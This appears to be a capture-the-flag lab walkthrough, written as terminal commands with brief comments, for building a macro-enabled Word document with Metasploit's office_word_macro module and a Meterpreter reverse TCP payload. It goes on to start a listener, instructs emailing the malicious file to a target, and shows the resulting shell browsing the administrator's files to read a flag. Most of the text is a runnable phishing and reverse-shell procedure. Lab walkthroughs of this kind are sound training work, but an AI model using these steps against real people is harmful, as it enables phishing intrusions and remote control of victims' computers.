MACRO EMBEDDING DOCX

root@oco:~$ msfconsole
root@oco:~$ set payload windows/meterpreter/reverse_tcp
 * this payload connects to the specified host & creates a reverse shell
root@oco:~$ use exploit/multi/fileformat/office_word_macro
 * use the office_word_macro module to create a document with a macro
root@oco:~$ set LHOST {attackerIP}
root@oco:~$ set LPORT {attackerIncomingConnectionPort}
root@oco:~$ show options
root@oco:~$ {run | exploit}
 * this generates a macro & embeds it in a document
root@oco:~$ exit

root@oco:~$ msfconsole
root@oco:~$ use multi/handler
 * this handles incoming connections
root@oco:~$ set payload windows/meterpreter/reverse_tcp
 * reiterating the payload in the listener ensures that this payload works with the payload used when creating the malicious macro
root@oco:~$ set LHOST {attackerIP}
 * should be the same as the one used when creating the malicious document
root@oco:~$ set LPORT {listeningPortNumber}
root@oco:~$ show options
root@oco:~$ run

 * send the malicious macro-enabled docx file to the target via email & wait for them to open the file

meterpreter > dir c:\\users\\
 Listing: c:\users\
 ==================

 Mode              Size   Type  Last modified              Name
 ----              ----   ----  -------------              ----
 040777/rwxrwxrwx  12288  dir   2024-12-10 22:46:16 +0000  Administrator
 040777/rwxrwxrwx  0      dir   2018-09-15 08:28:48 +0100  All Users
 040555/r-xr-xr-x  8192   dir   2021-03-17 14:58:07 +0000  Default
 040777/rwxrwxrwx  0      dir   2018-09-15 08:28:48 +0100  Default User
 040555/r-xr-xr-x  4096   dir   2018-12-12 07:45:15 +0000  Public
 100666/rw-rw-rw-  174    fil   2018-09-15 08:16:48 +0100  desktop.ini

 meterpreter > cd c:\\users\\administrator
 meterpreter > dir
 Listing: c:\users\administrator
===============================

 Mode              Size     Type  Last modified              Name
 ----              ----     ----  -------------              ----
 040555/r-xr-xr-x  4096     dir   2024-11-12 04:42:01 +0000  Desktop
 040555/r-xr-xr-x  4096     dir   2024-05-16 03:44:57 +0100  Documents
 040555/r-xr-xr-x  4096     dir   2024-11-12 04:07:46 +0000  Downloads

 meterpreter > cd Desktop
 meterpreter > dir
 Listing: c:\users\administrator\Desktop
 =======================================

 Mode              Size  Type  Last modified              Name
 ----              ----  ----  -------------              ----
 100666/rw-rw-rw-  527   fil   2016-06-21 16:36:17 +0100  EC2 Feedback.website
 100666/rw-rw-rw-  554   fil   2016-06-21 16:36:23 +0100  EC2 Microsoft Windows Guide.website
 100666/rw-rw-rw-  282   fil   2021-03-17 15:13:27 +0000  desktop.ini
 100666/rw-rw-rw-  23    fil   2024-11-12 03:42:45 +0000  flag.txt

meterpreter > cat flag.txt
 * THM{PHISHING_CHRISTMAS}